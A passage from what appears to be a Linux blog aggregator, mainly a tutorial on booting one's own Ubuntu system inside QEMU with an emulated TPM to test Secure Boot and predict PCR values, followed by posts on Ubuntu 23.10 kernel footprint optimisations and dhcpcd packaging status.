  • 2 CPUs (Copy host config)
  • Lubuntu 23.10 install
  • no swap file
  • ext4, no encryption
  • login automatically
  • Used virt-manager; the only change from the defaults was enabling UEFI
on November 25, 2023 02:42 AM

November 19, 2023

In this article I will show you how to start your current operating system inside a virtual machine. That is: launching the operating system (with all your settings, files, and everything), inside a virtual machine, while you’re using it.

This article was written for Ubuntu, but it can be easily adapted to other distributions, and with appropriate care it can be adapted to non-Linux kernels and operating systems as well.

Motivation

Before we start, why would a sane person want to do this in the first place? Well, here’s why I did it:

  • To test changes that affect Secure Boot without a reboot.

    Recently I was doing some experiments with Secure Boot and the Trusted Platform Module (TPM) on a new laptop, and I got frustrated by how time consuming it was to test changes to the boot chain. Every time I modified a file involved during boot, I would need to reboot, then log in, then re-open my terminal windows and files to make more modifications… Plus, whenever I screwed up, I would need to manually recover my system, which would be even more time consuming.

    I thought that I could speed up my experiments by using a virtual machine instead.

  • To predict the future TPM state (in particular, the values of PCRs 4, 5, 8, and 9) after a change, without a reboot.

    I wanted to predict the values of my TPM PCR banks after making changes to the bootloader, kernel, and initrd. Writing a script to calculate the PCR values automatically is in principle not that hard (and I actually did it before, in a different context), but I wanted a robust, generic solution that would work on most systems and in most situations, and emulation was the natural choice.

  • And, of course, just for the fun of it!

To be honest, I’m not a big fan of Secure Boot. The reason why I’ve been working on it is simply that it’s the standard nowadays and so I have to stick with it. Also, there are no real alternatives out there to achieve the same goals. I’ll write an article about Secure Boot in the future to explain the reasons why I don’t like it, and how to make it work better, but that’s another story…

Procedure

The procedure that I’m going to describe has 3 main steps:

  1. create a copy of your drive
  2. emulate a TPM device using swtpm
  3. emulate the system with QEMU

I’ve tested this procedure on Ubuntu 23.04 (Lunar) and 23.10 (Mantic), but it should work on any Linux distribution with minimal adjustments. The general approach can be used for any operating system, as long as appropriate replacements for QEMU and swtpm exist.

Prerequisites

Before we can start, we need to install:

  • QEMU: a virtual machine emulator
  • swtpm: a TPM emulator
  • OVMF: a UEFI firmware implementation

On a recent version of Ubuntu, these can be installed with:

sudo apt install qemu-system-x86 ovmf swtpm

Note that OVMF only supports the x86_64 architecture, so we can only emulate that. If you run a different architecture, you’ll need to find another UEFI implementation that is not OVMF (but I’m not aware of any freely available ones).

Create a copy of your drive

We can decide to either:

  • Choice #1: run only the components involved early at boot (shim, bootloader, kernel, initrd). This is useful if you, like me, only need to test those components and how they affect Secure Boot and the TPM, and don’t really care about the rest (the init process, login manager, …).

  • Choice #2: run the entire operating system. This can give you a fully usable operating system running inside the virtual machine, but may also result in some instability inside the guest (because we’re giving it a filesystem that is in use), and may also lead to some data loss if we’re not careful and make typos. Use with care!

Choice #1: Early boot components only

If we’re interested in the early boot components only, then we need to copy the following from our drive: the GPT partition table, the EFI partition, and the /boot partition (if we have one). Usually all three of these pieces are at the “start” of the drive, but this is not always the case.

To figure out where the partitions are located, run:

sudo parted -l

On my system, this is the output:

Model: WD_BLACK SN750 2TB (nvme)
Disk /dev/nvme0n1: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number  Start   End     Size    File system  Name  Flags
 1      1049kB  525MB   524MB   fat32              boot, esp
 2      525MB   1599MB  1074MB  ext4
 3      1599MB  2000GB  1999GB                     lvm

In my case, the partition number 1 is the EFI partition, and the partition number 2 is the /boot partition. If you’re not sure what partitions to look for, run mount | grep -e /boot -e /efi. Note that, on some distributions (most notably the ones that use systemd-boot), a /boot partition may not exist, so you can leave that out in that case.

Anyway, in my case, I need to copy the first 1599 MB of my drive, because that’s where the data I’m interested in ends: those first 1599 MB contain the GPT partition table (which is always at the start of the drive), the EFI partition, and the /boot partition.

Now that we have identified how many bytes to copy, we can copy them to a file named drive.img with dd (maybe after running sync to make sure that all changes have been committed):

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead),
# and 'count' with the number of MBs to copy
sync && sudo -g disk dd if=/dev/nvme0n1 of=drive.img bs=1M count=1599 conv=sparse

Choice #2: Entire system

If we want to run our entire system in a virtual machine, then I would recommend creating a QEMU copy-on-write (COW) file:

# replace '/dev/nvme0n1' with your main drive (which may be '/dev/sda' instead)
sudo -g disk qemu-img create -f qcow2 -b /dev/nvme0n1 -F raw drive.qcow2

This will create a new copy-on-write image using /dev/nvme0n1 as its “backing storage”. Be very careful when running this command: you don’t want to mess up the order of the arguments, or you might end up writing to your storage device (leading to data loss)!

The advantage of using a copy-on-write file, as opposed to copying the whole drive, is that this is much faster. Also, if we had to copy the entire drive, we might not even have enough space for it (even when using sparse files).

The big drawback of using a copy-on-write file is that, because our main drive likely contains filesystems that are mounted read-write, any modification to the filesystems on the host may be perceived as data corruption on the guest, and that in turn may cause all sort of bad consequences inside the guest, including kernel panics.

Another drawback is that, with this solution, later we will need to give QEMU permission to read our drive, and if we’re not careful enough with the commands we type (e.g. we swap the order of some arguments, or make some typos), we may potentially end up writing to the drive instead.

Emulate a TPM device using swtpm

There are various ways to run the swtpm emulator. Here I will use the “vTPM proxy” way, which is not the easiest, but has the advantage that the emulated device will look like a real TPM device not only to the guest, but also to the host, so that we can inspect its PCR banks (among other things) from the host using familiar tools like tpm2_pcrread.

First, enable the tpm_vtpm_proxy module (which is not enabled by default on Ubuntu):

sudo modprobe tpm_vtpm_proxy

If that worked, we should have a /dev/vtpmx device. We can verify its presence with:

ls /dev/vtpmx

swtpm in “vTPM proxy” mode will interact with /dev/vtpmx, but in order to do so it needs the sys_admin capability. On Ubuntu, swtpm ships with this capability explicitly disabled by AppArmor, but we can enable it with:

sudo sh -c "echo '  capability sys_admin,' > /etc/apparmor.d/local/usr.bin.swtpm"
sudo systemctl reload apparmor

Now that /dev/vtpmx is present, and swtpm can talk to it, we can run swtpm in “vTPM proxy” mode:

sudo mkdir /tmp/swtpm-state
sudo swtpm chardev --tpmstate dir=/tmp/swtpm-state --vtpm-proxy --tpm2

Upon start, swtpm should create a new /dev/tpmN device and print its name on the terminal. On my system, I already have a real TPM on /dev/tpm0, and therefore swtpm allocates /dev/tpm1.

The emulated TPM device will need to be readable and writeable by QEMU, but the emulated TPM device is by default accessible only by root, so either we run QEMU as root (not recommended), or we relax the permissions on the device:

# replace '/dev/tpm1' with the device created by swtpm
sudo chmod a+rw /dev/tpm1

Make sure not to accidentally change the permissions of your real TPM device!

Emulate the system with QEMU

Inside the QEMU emulator, we will run the OVMF UEFI firmware. On Ubuntu, the firmware comes in 2 flavors:

  • with Secure Boot enabled (/usr/share/OVMF/OVMF_CODE_4M.ms.fd), and
  • with Secure Boot disabled (in /usr/share/OVMF/OVMF_CODE_4M.fd)

(There are actually even more flavors, see this AskUbuntu question for the details.)

In the commands that follow I’m going to use the Secure Boot flavor, but if you need to disable Secure Boot in your guest, just replace .ms.fd with .fd in all the commands below.

To use OVMF, first we need to copy the EFI variables to a file that can be read & written by QEMU:

cp /usr/share/OVMF/OVMF_VARS_4M.ms.fd /tmp/

This file (/tmp/OVMF_VARS_4M.ms.fd) will be the equivalent of the EFI flash storage, and it’s where OVMF will read and store its configuration, which is why we need to make a copy of it (to avoid modifications to the original file).

Now we’re ready to run QEMU:

  • If you copied only the early boot files (choice #1):

    # replace '/dev/tpm1' with the device created by swtpm
    qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -bios /usr/share/ovmf/OVMF.fd \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=raw,file=drive.img \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    
  • If you have a copy-on-write file for the entire system (choice #2):

    # replace '/dev/tpm1' with the device created by swtpm
    sudo -g disk qemu-system-x86_64 \
      -accel kvm \
      -machine q35,smm=on \
      -cpu host \
      -smp cores=4,threads=1 \
      -m 4096 \
      -vga virtio \
      -bios /usr/share/ovmf/OVMF.fd \
      -drive if=pflash,unit=0,format=raw,file=/usr/share/OVMF/OVMF_CODE_4M.ms.fd,readonly=on \
      -drive if=pflash,unit=1,format=raw,file=/tmp/OVMF_VARS_4M.ms.fd \
      -drive if=virtio,format=qcow2,file=drive.qcow2 \
      -tpmdev passthrough,id=tpm0,path=/dev/tpm1,cancel-path=/dev/null \
      -device tpm-tis,tpmdev=tpm0
    

    Note that this last command makes QEMU run with the disk group: on Ubuntu, this group has permission to read and write all storage devices, so be careful when running this command, or you risk losing your files forever! If you want extra safety, consider using an ACL to give the user running QEMU read-only access to your backing storage, as sketched below.
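
A hypothetical ACL for that purpose (substitute your own user name and backing device) could be:

# Give the current user read-only access to the backing device,
# so QEMU can be run without 'sudo -g disk'
sudo setfacl -m u:$(whoami):r /dev/nvme0n1
# Remove the ACL entry again when done
sudo setfacl -x u:$(whoami) /dev/nvme0n1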

In either case, after launching QEMU, our operating system should boot… while running inside itself!

In some circumstances though it may happen that the wrong operating system is booted, or that you end up at the EFI setup screen. This can happen if your system is not configured to boot from the “first” EFI entry listed in the EFI partition. Because the boot order is not recorded anywhere on the storage device (it’s recorded in the EFI flash memory), of course OVMF won’t know which operating system you intended to boot, and will just attempt to launch the first one it finds. You can use the EFI setup screen provided by OVMF to change the boot order in the way you like. After that, changes will be saved into the /tmp/OVMF_VARS_4M.ms.fd file on the host: you should keep a copy of that file so that, next time you launch QEMU, you’ll boot directly into your operating system.

Reading PCR banks after boot

Once our operating system has launched inside QEMU, and after the boot process is complete, the PCR banks will be filled and recorded by swtpm.

If we choose to copy only the early boot files (choice #1), then of course our operating system won’t be fully booted: it’ll likely hang waiting for the root filesystem to appear, and may eventually drop to the initrd shell. None of that really matters if all we want is to see the PCR values stored by the bootloader.

Before we can extract those PCR values, we first need to stop QEMU (Ctrl-C is fine), and then we can read them with tpm2_pcrread:

# replace '/dev/tpm1' with the device created by swtpm
tpm2_pcrread -T device:/dev/tpm1

Using the method described in this article, PCRs 4, 5, 8, and 9 inside the emulated TPM should match the PCRs in our real TPM. And here comes an interesting application of this method: if we upgrade our bootloader or kernel and want to know the PCR values our system will have after reboot, we can simply follow this procedure and obtain those values without shutting down our system! This can be especially useful if we use TPM sealing: we can reseal our secrets so that they can be unsealed at the next reboot without trouble.
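
For instance, assuming the real TPM is /dev/tpm0 and the emulated one is /dev/tpm1, the two sets of banks can be compared side by side:

# Future values, from the emulated TPM
tpm2_pcrread -T device:/dev/tpm1 sha256:4,5,8,9
# Current values, from the real TPM (may require root)
tpm2_pcrread -T device:/dev/tpm0 sha256:4,5,8,9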

Restarting the virtual machine

If we want to restart the guest inside the virtual machine, and obtain a consistent TPM state every time, we should start from a “clean” state every time, which means:

  1. restart swtpm
  2. recreate the drive.img or drive.qcow2 file
  3. launch QEMU again

If we don’t restart swtpm, the virtual TPM state (and in particular the PCR banks) won’t be cleared, and new PCR measurements will simply be added on top of the existing state. If we don’t recreate the drive file, it’s possible that some modifications to the filesystems will have an impact on the future PCR measurements.

We don’t necessarily need to recreate the /tmp/OVMF_VARS_4M.ms.fd file every time. In fact, if you need to modify any EFI setting to make your system bootable, you might want to preserve it so that you don’t need to change EFI settings at every boot.
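
As a concrete sketch, a manual reset-and-relaunch for choice #1, reusing the device and file names from above, could look like this (the previous swtpm instance is assumed to have been stopped):

# 1. Restart swtpm so the PCR banks start from a clean state
#    (note the /dev/tpmN it prints, and relax its permissions again)
sudo swtpm chardev --tpmstate dir=/tmp/swtpm-state --vtpm-proxy --tpm2 &
sudo chmod a+rw /dev/tpm1   # replace with the device swtpm printed
# 2. Recreate the drive image (adjust the device and count as before)
sync && sudo -g disk dd if=/dev/nvme0n1 of=drive.img bs=1M count=1599 conv=sparse
# 3. Launch QEMU again with the same command as above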

Automating the entire process

I’m (very slowly) working on turning this entire procedure into a script, so that everything can be automated. Once I find some time I’ll finish the script and publish it, so if you liked this article, stay tuned, and let me know if you have any comment/suggestion/improvement/critique!

on November 19, 2023 04:33 PM

November 16, 2023



Ubuntu systems typically have up to 3 kernels installed before they are auto-removed by apt on classic installs. Historically, the installation was optimized for metered download size only. However, kernel size growth and usage patterns no longer warrant such optimizations. During the 23.10 Mantic Minotaur cycle, I led a coordinated effort across multiple teams to implement many optimizations that together achieved unprecedented install footprint improvements.

Given a typical install of 3 generic kernel ABIs in the default configuration on a regular-sized VM (2 CPU cores, 8 GB of RAM), the following metrics are achieved in Ubuntu 23.10 versus Ubuntu 22.04 LTS:

  • 2x less disk space used (1,417MB vs 2,940MB, including initrd)

  • 3x less peak RAM usage for the initrd boot (68MB vs 204MB)

  • 0.5x increase in download size (949MB vs 600MB)

  • 2.5x faster initrd generation (4.5s vs 11.3s)

  • approximately the same total time (103s vs 98s, hardware dependent)


For minimal cloud images that do not install either linux-firmware or modules extra, the numbers are:

  • 1.3x less disk space used (548MB vs 742MB)

  • 2.2x less peak RAM usage for initrd boot (27MB vs 62MB)

  • 0.4x increase in download size (207MB vs 146MB)


Hopefully, the compromise of download size, relative to the disk space & initrd savings is a win for the majority of platforms and use cases. For users on extremely expensive and metered connections, the likely best saving is to receive air-gapped updates or skip updates.


This was achieved by:

  • precompressing kernel modules & firmware files with the maximum level of Zstd compression at package build time;
  • making the actual .deb files uncompressed;
  • assembling the initrd using split cpio archives - uncompressed for the pre-compressed files, whilst compressing only the userspace portions of the initrd;
  • enabling in-kernel module decompression support with a matching kmod;
  • fixing bugs in all of the above, and landing all of these things in time for the feature freeze.

All of this leverages the experience, and some of the design choices and implementations, that we have already been shipping on Ubuntu Core. Some of these changes are backported to Jammy, but only enough to support smooth upgrades to Mantic and later; the complete gains can only be experienced on Mantic and later.
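
One visible effect of the module precompression: on a Mantic or later system, the kernel modules on disk now carry a .zst suffix, which can be checked with something like:

# List a few Zstd-compressed kernel modules for the running kernel
find /lib/modules/$(uname -r) -name '*.ko.zst' | head -n 5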


The discovered bugs in kernel module loading code likely affect systems that use LoadPin LSM with kernel space module uncompression as used on ChromeOS systems. Hopefully, Kees Cook or other ChromeOS developers pick up the kernel fixes from the stable trees. Or you know, just use Ubuntu kernels as they do get fixes and features like these first.


The team that designed and delivered these changes is large: Benjamin Drung, Andrea Righi, Juerg Haefliger, Julian Andres Klode, Steve Langasek, Michael Hudson-Doyle, Robert Kratky, Adrien Nader, Tim Gardner, Roxana Nicolescu - and myself Dimitri John Ledkov ensuring the most optimal solution is implemented, everything lands on time, and even implementing portions of the final solution.


Hi, it's me. I am a Staff Engineer at Canonical, and we are hiring: https://canonical.com/careers.


Lots of additional technical details, benchmarks on a huge range of diverse hardware and architectures, and bikeshedding of all the things can be found in the discussion below.


For questions and comments, please post to the Kernel section on Ubuntu Discourse.



on November 16, 2023 10:45 AM

A lot of time has passed since my previous post on my work to make dhcpcd the drop-in replacement for the deprecated ISC dhclient a.k.a. isc-dhcp-client. Current status:

  • Upstream now regularly produces releases, with a smaller delta than before. This makes it easier to track possible breakage.
  • Debian packaging has essentially remained unchanged. A few Recommends were shuffled, but that's about it.
  • The only remaining bug is fixing the build for Hurd. Patches are welcome. Once that is fixed, bumping dhcpcd-base's priority to important is all that's left.
on November 16, 2023 09:38 AM